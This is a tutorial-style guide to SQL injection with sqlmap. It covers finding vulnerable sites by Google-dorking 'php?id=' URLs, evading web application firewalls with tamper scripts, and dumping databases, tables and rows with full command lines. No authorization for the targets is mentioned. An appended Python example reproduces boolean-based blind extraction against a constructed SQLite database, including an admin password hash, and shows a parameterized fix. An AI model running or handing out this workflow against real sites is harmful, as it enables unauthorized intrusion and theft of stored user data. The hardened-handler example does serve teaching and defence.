- Hey and welcome, today we are going to do SQL injection with sqlmap.
- SQL injection means that input we control (here a URL parameter) ends up inside the query the web application sends to its back-end database, so we can make that database run SQL of our choosing.
- We are going to split this into 3 sections: finding a target, enumerating the target and dumping the target.
- ##finding target
- We start by finding a URL that we can use in SQLMAP
- A very common way to find dynamic links is to google "php?id=" (Google dorking).
- "www.examplefind/product.php?id=200" is an example of the type of URL we want: a numeric parameter that is very likely pasted straight into a query such as SELECT ... FROM products WHERE id=200.
- ##enumerating target
- Once we have the URL we start enumerating: which DBMS and version it runs, and whether the site is behind a WAF or not.
- If you want cheat sheet for manual checking you can find it here > http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet
- But since we are working with lots of dynamic links we are going to use a tool: sqlmap.
- It's important to check for a WAF before you do anything else, so open up a terminal and run
- sqlmap -u "www.examplefind/product.php?id=200" --identify-waf
- (Note: --identify-waf only exists in older sqlmap releases; current versions run the WAF check automatically at the start of every scan and print a warning if one is detected, and --skip-waf turns that check off.)
- If it finds one, google the result and pick the matching tamper script from sqlmap's tamper/ directory, passed as --tamper="scripthere" (several scripts can be given comma-separated).
- So far so good
- sqlmap -u "www.examplefind/product.php?id=200" --tamper="scripthere" -f
- sqlmap now tries to fingerprint the back end (-f), so when it's finished we hopefully get the DBMS and its version.
- For a higher success rate and more verbose output you can use this
- sqlmap -u "www.examplefind/product.php?id=200" --tamper="scripthere" -f --random-agent --level 5 --risk 3 --time-sec=2 -v3
- Two caveats: --level 5 also tests the Cookie, User-Agent, Referer and Host headers, and --risk 3 adds OR-based payloads that can modify data if the parameter ends up in an UPDATE or DELETE statement; --time-sec=2 speeds up the time-based tests but makes them easier to fool on a slow connection.
- ##dumping target
- Let's pretend sqlmap told us the back-end DBMS is MySQL, and if we were lucky it also reported a vulnerable parameter ('<just an example>') with a string ("<just an example>") and technique B (boolean-based blind: the page content differs depending on whether the injected condition is true or false, and the string is the piece of text that only shows up on the "true" page).
- Now we just
- sqlmap -u "www.examplefind/product.php?id=200" --tamper="scripthere" --random-agent --level 5 --risk 3 --time-sec=2 -v3 --technique=B --dbms=mysql -p <parameter> --string="<string>" --dbs
- (Fill in <parameter> and <string> with what sqlmap reported; with --level 5 the parameter can also be a header such as Host. Passing the DBMS, parameter, technique and string narrows the detection phase to exactly what we already know, which is why this run is much faster than the first one.)
- We should get all the database names.
- For the tables we replace --dbs with -D <databasename> --tables
- sqlmap -u "www.examplefind/product.php?id=200" --tamper="scripthere" --random-agent --level 5 --risk 3 --time-sec=2 -v3 --technique=B --dbms=mysql -p <parameter> --string="<string>" -D <databasename> --tables
- and finally for the columns, and then the contents of the table, we do
- sqlmap -u "www.examplefind/product.php?id=200" --tamper="scripthere" --random-agent --level 5 --risk 3 --time-sec=2 -v3 --technique=B --dbms=mysql -p <parameter> --string="<string>" -D <databasename> -T <tablename> --columns --dump
- (--dump pulls every row through the blind channel, a few requests per character, so add -C <column1,column2> to limit it to the columns you actually need.)
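To show what technique B and the --string marker actually do under the hood (the enumerating and dumping steps above), here is an added example that is not part of this paste and is not sqlmap's own code. It assumes a constructed SQLite database standing in for the MySQL back end, a vulnerable handler that imitates product.php?id= by concatenating the parameter into the query, and a hand-picked true-page marker ("Price:") playing the role of --string; the hardened handler shows the fix. All names and data below are made up for the example.

```python
import sqlite3

# Constructed stand-in for the target's back end. The paste assumes MySQL;
# SQLite is used here only so the example runs offline.
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products(id INTEGER PRIMARY KEY, name TEXT, price REAL);
        INSERT INTO products VALUES (200, 'Widget', 9.99), (201, 'Gadget', 19.99);
        CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT);
        INSERT INTO users VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99');
    """)
    return conn


def product_page(conn, id_param):
    """Vulnerable handler imitating product.php?id=...: the parameter is
    concatenated straight into the SQL, which is what makes it a sqlmap target."""
    sql = "SELECT name, price FROM products WHERE id=" + id_param
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.Error:
        return "<h1>Error</h1>"
    if row is None:
        return "<h1>Product not found</h1>"
    return "<h1>%s</h1><p>Price: %.2f</p>" % row


def product_page_safe(conn, id_param):
    """Hardened handler: the value is type-checked and bound as a parameter,
    so an appended 'AND ...' never reaches the SQL parser."""
    try:
        product_id = int(id_param)
    except ValueError:
        return "<h1>Bad request</h1>"
    row = conn.execute("SELECT name, price FROM products WHERE id=?", (product_id,)).fetchone()
    if row is None:
        return "<h1>Product not found</h1>"
    return "<h1>%s</h1><p>Price: %.2f</p>" % row


KNOWN_GOOD_ID = "200"   # a value that returns a normal page
TRUE_STRING = "Price:"  # the --string: text present only when the condition is true


def ask(conn, condition, handler=product_page):
    """One boolean-based blind request (sqlmap technique B): append the
    condition to the known-good id and look for the true-page marker."""
    return TRUE_STRING in handler(conn, "%s AND (%s)" % (KNOWN_GOOD_ID, condition))


def extract(conn, subquery, handler=product_page, max_len=64):
    """Recover the single string `subquery` returns, one character at a time,
    by binary-searching its ASCII code (7 requests per character)."""
    result = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            # MySQL equivalent: ASCII(SUBSTRING((subquery),pos,1)) > mid
            cond = "unicode(substr((%s),%d,1)) > %d" % (subquery, pos, mid)
            if ask(conn, cond, handler):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            # substr() past the end yields '' and unicode('') is NULL, so every
            # comparison came back false: the string is complete.
            break
        result += chr(lo)
    return result


if __name__ == "__main__":
    db = build_db()
    print("-f      :", extract(db, "SELECT sqlite_version()"))
    # MySQL equivalent of --tables: information_schema.tables
    print("--tables:", extract(db, "SELECT group_concat(name) FROM sqlite_master WHERE type='table'"))
    print("--dump  :", extract(db, "SELECT username || ':' || password_hash FROM users WHERE id=1"))
    print("hardened:", repr(extract(db, "SELECT sqlite_version()", handler=product_page_safe)))
```

Run as a script it prints the DBMS version (what -f obtains), the table names (what --tables obtains, from sqlite_master instead of information_schema) and the admin row (what --dump obtains), each recovered purely from yes/no answers; against the hardened handler the same oracle gets nothing back. Seven requests per character is also why a full --dump over a blind injection is slow and very visible in the server logs.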